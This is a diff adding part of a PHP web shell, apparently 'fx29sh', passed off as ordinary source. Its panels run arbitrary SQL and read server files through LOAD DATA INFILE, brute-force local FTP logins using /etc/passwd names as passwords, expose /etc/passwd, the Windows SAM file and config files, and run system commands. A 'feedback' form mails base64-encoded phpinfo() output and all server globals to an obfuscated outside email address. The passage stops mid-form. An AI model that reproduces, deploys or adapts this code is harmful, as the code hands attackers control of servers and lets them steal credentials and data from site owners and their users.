+        echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
+        echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>";
+        echo "<tr>";
+        echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
+        for ($i=0;$i<mysql_num_fields($result);$i++) {
+          $v = mysql_field_name($result,$i);
+          if ($e[0] == "a") {$s = "d"; $m = "asc";}
+          else {$s = "a"; $m = "desc";}
+          echo "<td>";
+          if (empty($e[0])) {$e[0] = "a";}
+          if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
+          else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
+          echo "</td>";
+        }
+      echo "<td><font color=\"green\"><b>Action</b></font></td>";
+      echo "</tr>";
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
+       echo "<tr>";
+       $w = "";
+       $i = 0;
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
+       $i = 0;
+       foreach ($row as $k=>$v)
+       {
+        $v = htmlspecialchars($v);
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
+        echo "<td>".$v."</td>";
+        $i++;
+       }
+       echo "<td>";
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
+       echo "</td>";
+       echo "</tr>";
+      }
+      mysql_free_result($result);
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"deleterow\">Delete</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+     }
+    }
+    else {
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+     if (!$result) {echo mysql_smarterror();}
+     else
+     {
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
+      $i = 0;
+      $tsize = $trows = 0;
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       $tsize += $row["Data_length"];
+       $trows += $row["Rows"];
+       $size = view_size($row["Data_length"]);
+       echo "<tr>";
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
+       echo "<td>".$row["Rows"]."</td>";
+       echo "<td>".$row["Type"]."</td>";
+       echo "<td>".$row["Create_time"]."</td>";
+       echo "<td>".$row["Update_time"]."</td>";
+       echo "<td>".$size."</td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
+       echo "</tr>";
+       $i++;
+      }
+      echo "<tr bgcolor=\"000000\">";
+      echo "<td><center><b>+</b></center></td>";
+      echo "<td><center><b>".$i." table(s)</b></center></td>";
+      echo "<td><b>".$trows."</b></td>";
+      echo "<td>".$row[1]."</td>";
+      echo "<td>".$row[10]."</td>";
+      echo "<td>".$row[11]."</td>";
+      echo "<td><b>".view_size($tsize)."</b></td>";
+      echo "<td></td>";
+      echo "</tr>";
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"tbldrop\">Drop</option>";
+      echo "<option value=\"tblempty\">Empty</option>";
+      echo "<option value=\"tbldump\">Dump</option>";
+      echo "<option value=\"tblcheck\">Check table</option>";
+      echo "<option value=\"tbloptimize\">Optimize table</option>";
+      echo "<option value=\"tblrepair\">Repair table</option>";
+      echo "<option value=\"tblanalyze\">Analyze table</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+      mysql_free_result($result);
+     }
+    }
+   }
+   }
+  }
+  else {
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
+   if (!empty($sql_act)) {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb") {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+    }
+    if ($sql_act == "serverstatus") {
+     $result = mysql_query("SHOW STATUS", $sql_sock);
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars") {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock);
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes") {
+     if (!empty($kill)) {
+       $query = "KILL ".$kill.";";
+       $result = mysql_query($query, $sql_sock);
+       echo "<b>Process #".$kill." was killed.</b>";
+     }
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "getfile")
+    {
+     $tmpdb = $sql_login."_tmpdb";
+     $select = mysql_select_db($tmpdb);
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+     if ($select)
+     {
+      $created = FALSE;
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+      $result = mysql_query("SELECT * FROM tmp_file;");
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
+      else
+      {
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+       $f = "";
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
+       mysql_free_result($result);
+       mysql_query("DROP TABLE tmp_file;");
+      }
+     }
+     mysql_drop_db($tmpdb);
+    }
+   }
+  }
+}
+echo "</td></tr></table>\n";
+if ($sql_sock) {
+  $affected = @mysql_affected_rows($sql_sock);
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+  echo "<tr><td><center><b>Affected rows : ".$affected."</center></td></tr>";
+}
+echo "</table>\n";
+}
+//End of SQL Manager
+if ($act == "ftpquickbrute") {
+echo "<center><table><tr><td class=barheader colspan=2>";
+echo ".: Ftp Quick Brute :.</td></tr>";
+echo "<tr><td>";
+if ($win) { echo "Can't run on Windows!"; }
+else {
+  function fx29ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) {
+    if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
+    else {$TRUE = TRUE;}
+    if ($TRUE) {
+      $sock = @ftp_connect($host,$port,$timeout);
+      if (@ftp_login($sock,$login,$pass)) {
+        echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+        ob_flush();
+        return TRUE;
+      }
+    }
+  }
+  if (!empty($submit)) {
+    if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+    $fp = fopen("/etc/passwd","r");
+    if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+    else {
+      if ($fqb_logging) {
+        if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
+        else {$fqb_logfp = FALSE;}
+        $fqb_log = "FTP Quick Brute (".$sh_name.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
+        if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      }
+      ob_flush();
+      $i = $success = 0;
+      $ftpquick_st = getmicrotime();
+      while(!feof($fp)) {
+        $str = explode(":",fgets($fp,2048));
+        if (fx29ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) {
+          echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
+          $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
+          if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+          $success++;
+          ob_flush();
+        }
+        if ($i > $fqb_lenght) {break;}
+        $i++;
+      }
+      if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
+      $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+      echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
+      $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      if ($fqb_logemail) {@mail($fqb_logemail,"".$sh_name." report",$fqb_log);}
+      fclose($fqb_logfp);
+    }
+  }
+  else {
+    $logfile = $tmpdir_logs."fx29sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
+    $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
+    echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\">".
+         "Read first:</td><td><input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"></td></tr>".
+         "<tr><td></td><td><input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"> Users only with shell</td></tr>".
+         "<tr><td></td><td><input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked>Logging</td></tr>".
+         "<tr><td>Logging to file:</td><td><input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"></td></tr>".
+         "<tr><td>Logging to e-mail:</td><td><input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"></td></tr>".
+         "<tr><td colspan=2><input type=submit name=submit value=\"Brute\"></form>";
+  }
+  echo "</td></tr></table></center>";
+}
+}
+if ($act == "d") {
+  if (!is_dir($d)) { echo "<center><b>$d is a not a Directory!</b></center>"; }
+  else {
+    echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+    if (!$win) {
+      echo "<tr><td><b>Owner/Group</b></td><td> ";
+      $ow = posix_getpwuid(fileowner($d));
+      $gr = posix_getgrgid(filegroup($d));
+      $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+    }
+    echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table>";
+  }
+}
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); fx29shexit();}
+if ($act == "security") {
+  echo "<div class=barheader>.: Server Security Information :.</div>\n".
+       "<table>\n".
+       "<tr><td>Open Base Dir</td><td>".$hopenbasedir."</td></tr>\n";
+  echo "<td>Password File</td><td>";
+  if (!$win) {
+    if ($nixpasswd) {
+      if ($nixpasswd == 1) {$nixpasswd = 0;}
+      echo "*nix /etc/passwd:<br>";
+      if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+      if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+      echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
+      $i = $nixpwd_s;
+      while ($i < $nixpwd_e) {
+        $uid = posix_getpwuid($i);
+        if ($uid) {
+          $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
+          echo join(":",$uid)."<br>";
+        }
+        $i++;
+      }
+    }
+    else {echo "<a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b>Download /etc/passwd</b></a>";}
+  }
+  else {
+    $v = $_SERVER["WINDIR"]."\repair\sam";
+    if (!file_get_contents($v)) { echo "<a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><b>Download password file</b></a>"; }
+  }
+  echo "</td></tr>\n";
+  echo "<tr><td>Config Files</td><td>\n";
+  if (!$win) {
+    $v = array(
+        array("User Domains","/etc/userdomains"),
+        array("Cpanel Config","/var/cpanel/accounting.log"),
+        array("Apache Config","/usr/local/apache/conf/httpd.conf"),
+        array("Apache Config","/etc/httpd.conf"),
+        array("Syslog Config","/etc/syslog.conf"),
+        array("Message of The Day","/etc/motd"),
+        array("Hosts","/etc/hosts")
+    );
+    $sep = "/";
+  }
+  else {
+    $windir = $_SERVER["WINDIR"];
+    $etcdir = $windir . "\system32\drivers\etc\\";
+    $v = array(
+        array("Hosts",$etcdir."hosts"),
+        array("Local Network Map",$etcdir."networks"),
+        array("LM Hosts",$etcdir."lmhosts.sam"),
+    );
+    $sep = "\\";
+  }
+  foreach ($v as $sec_arr) {
+    $sec_f = substr(strrchr($sec_arr[1], $sep), 1);
+    $sec_d = rtrim($sec_arr[1],$sec_f);
+    $sec_full = $sec_d.$sec_f;
+    $sec_d = rtrim($sec_d,$sep);
+    if (file_get_contents($sec_full)) {
+      echo " [ <a href=\"".$surl."act=f&f=$sec_f&d=".urlencode($sec_d)."&ft=txt\"><b>".$sec_arr[0]."</b></a> ] \n";
+    }
+  }
+  echo "</td></tr>";
+
+  function displaysecinfo($name,$value) {
+    if (!empty($value)) {
+      echo "<tr><td>".$name."</td><td><pre>".wordwrap($value,100)."</pre></td></tr>\n";
+    }
+  }
+  if (!$win) {
+    displaysecinfo("OS Version",fx29exec("cat /proc/version"));
+    displaysecinfo("Kernel Version",fx29exec("sysctl -a | grep version"));
+    displaysecinfo("Distrib Name",fx29exec("cat /etc/issue.net"));
+    displaysecinfo("Distrib Name (2)",fx29exec("cat /etc/*-realise"));
+    displaysecinfo("CPU Info",fx29exec("cat /proc/cpuinfo"));
+    displaysecinfo("RAM",fx29exec("free -m"));
+    displaysecinfo("HDD Space",fx29exec("df -h"));
+    displaysecinfo("List of Attributes",fx29exec("lsattr -a"));
+    displaysecinfo("Mount Options",fx29exec("cat /etc/fstab"));
+    displaysecinfo("lynx installed?",fx29exec("which lynx"));
+    displaysecinfo("links installed?",fx29exec("which links"));
+    displaysecinfo("GET installed?",fx29exec("which GET"));
+    displaysecinfo("Where is Apache?",fx29exec("whereis apache"));
+    displaysecinfo("Where is perl?",fx29exec("whereis perl"));
+    displaysecinfo("Locate proftpd.conf",fx29exec("locate proftpd.conf"));
+    displaysecinfo("Locate httpd.conf",fx29exec("locate httpd.conf"));
+    displaysecinfo("Locate my.conf",fx29exec("locate my.conf"));
+    displaysecinfo("Locate psybnc.conf",fx29exec("locate psybnc.conf"));
+  }
+  else {
+    displaysecinfo("OS Version",fx29exec("ver"));
+    displaysecinfo("Account Settings",fx29exec("net accounts"));
+    displaysecinfo("User Accounts",fx29exec("net user"));
+  }
+  echo "</table>\n";
+}
+if ($act == "mkfile") {
+  if ($mkfile != $d) {
+    if ($overwrite == 0) {
+      if (file_exists($mkfile)) { echo "<b>FILE EXIST:</b> $overwrite ".htmlspecialchars($mkfile); }
+    }
+    else {
+      if (!fopen($mkfile,"w")) { echo "<b>ACCESS DENIED:</b> ".htmlspecialchars($mkfile); }
+      else { $act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile); }
+    }
+  }
+  else { echo "<div class=fxerrmsg>Enter filename!</div>\r\n"; }
+}
+if ($act == "encoder") {
+echo "<script language=\"javascript\">function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script>".
+     "<form name=\"encoder\" action=\"".$surl."\" method=POST>".
+     "<input type=hidden name=act value=encoder>".
+     "<center><table class=contents>".
+     "<tr><td colspan=4 class=barheader>.: Encoder :.</td>".
+     "<tr><td colspan=2>Input:</td><td><textarea name=\"encoder_input\" id=\"input\" cols=70 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br>".
+     "<input type=submit value=\"calculate\"></td></tr>".
+     "<tr><td rowspan=4>Hashes:</td>";
+foreach(array("md5","crypt","sha1","crc32") as $v) {
+  echo "<td>".$v.":</td><td><input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly></td></tr><tr>";
+}
+echo "</tr>".
+     "<tr><td rowspan=2>Url:</td>".
+     "<td>urlencode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly></td></tr>".
+     "<tr><td>urldecode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly></td></tr>".
+     "<tr><td rowspan=2>Base64:</td>".
+     "<td>base64_encode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></td></tr>".
+     "<tr><td>base64_decode:</td><td>";
+if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"Failed!\" disabled readonly>";}
+else {
+  $debase64 = base64_decode($encoder_input);
+  $debase64 = str_replace("\0","[0]",$debase64);
+  $a = explode("\r\n",$debase64);
+  $rows = count($a);
+  $debase64 = htmlspecialchars($debase64);
+  if ($rows == 1) { echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>"; }
+  else { $rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>"; }
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\">[Send to input]</a>";
+}
+echo "</td></tr>".
+     "<tr><td>Base convertations:</td><td>dec2hex</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
+$c = strlen($encoder_input);
+for($i=0;$i<$c;$i++) {
+  $hex = dechex(ord($encoder_input[$i]));
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
+}
+echo "\" readonly></td></tr></table></center></form>";
+}
+if ($act == "fsbuff") {
+  $arr_copy = $sess_data["copy"];
+  $arr_cut = $sess_data["cut"];
+  $arr = array_merge($arr_copy,$arr_cut);
+  if (count($arr) == 0) {echo "<h2><center>Buffer is empty!</center></h2>";}
+  else {
+    $fx_infohead = "File-System Buffer";
+    $ls_arr = $arr;
+    $disp_fullpath = TRUE;
+    $act = "ls";
+  }
+}
+if ($act == "selfremove") {
+  if (($submit == $rndcode) and ($submit != "")) {
+    if (unlink(__FILE__)) { @ob_clean(); echo "Thanks for using ".$sh_name."!"; fx29shexit(); }
+    else { echo "<center><b>Can't delete ".__FILE__."!</b></center>"; }
+  }
+  else {
+    if (!empty($rndcode)) {echo "<b>Error: incorrect confirmation!</b>";}
+    $rnd = rand(0,9).rand(0,9).rand(0,9);
+    echo "<form action=\"".$surl."\">\n".
+         "<input type=hidden name=act value=selfremove>".
+         "<input type=hidden name=rndcode value=\"".$rnd."\">".
+         "<b>Kill-shell: ".__FILE__." <br>".
+         "<b>Are you sure? For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=text name=submit>&nbsp;<input type=submit value=\"YES\">\n".
+         "</form>\n";
+  }
+}
+if ($act == "update") {
+  $ret = fx29sh_getupdate(!!$confirmupdate);
+  echo "<b>".$ret."</b>";
+  if (stristr($ret,"new version")) {
+    echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";
+  }
+}
+if ($act == "feedback") {
+  $suppmail = base64_decode("ZmVlbGNvbXpAZ21haWwuY29t");
+  if (!empty($submit)){
+    $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
+    $body = $sh_name." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
+    if (!empty($fdbk_ref)) {
+      $tmp = @ob_get_contents();
+      ob_clean();
+      phpinfo();
+      $phpinfo = base64_encode(ob_get_contents());
+      ob_clean();
+      echo $tmp;
+      $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
+    }
+    mail($suppmail,$sh_name." feedback #".$ticket,$body,"FROM: ".$suppmail);
+    echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
+  }
+  else {
+    echo "<form action=\"".$surl."\" method=POST>".
+         "<input type=hidden name=act value=feedback>".
+         "<table class=contents><tr><td class=barheader colspan=2>".
+         ".: Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail).") :.</td></tr>".
+         "<tr><td>Your name:</td><td><input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"></td</tr>".
+         "<tr><td>Your e-mail:</td><td><input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"></td></tr>".
+         "<tr><td>Message:</td><td><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br>".
+         "<input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked> Attach Server info (Recommended for bug-fix)<br>".
+         "*Language: English, Indonesian.</td></tr>".
+         "<tr><td></td><td><input type=\"submit\" name=\"submit\" value=\"Send\"></form></td></tr>".
+         "</table>\n";
+  }
+}
+if ($act == "fxmailer") {
+  if (!empty($submit)){
+    $headers = 'To: '.$dest_email."\r\n";
+    $headers .= 'From: '.$sender_name.' '.$sender_email."\r\n";
+    if (mail($suppmail,$sender_subj,$sender_body,$header)) {
+      echo "<center><b>Email sent!</b></center>";
+    }
+    else { echo "<center><b>Can't send email!</b></center>"; }
+  }
+  else {
+    echo "<form action=\"".$surl."\" method=POST>".
+         "<input type=hidden name=act value=fxmailer>".
+         "<table class=contents><tr><td class=barheader colspan=2>".
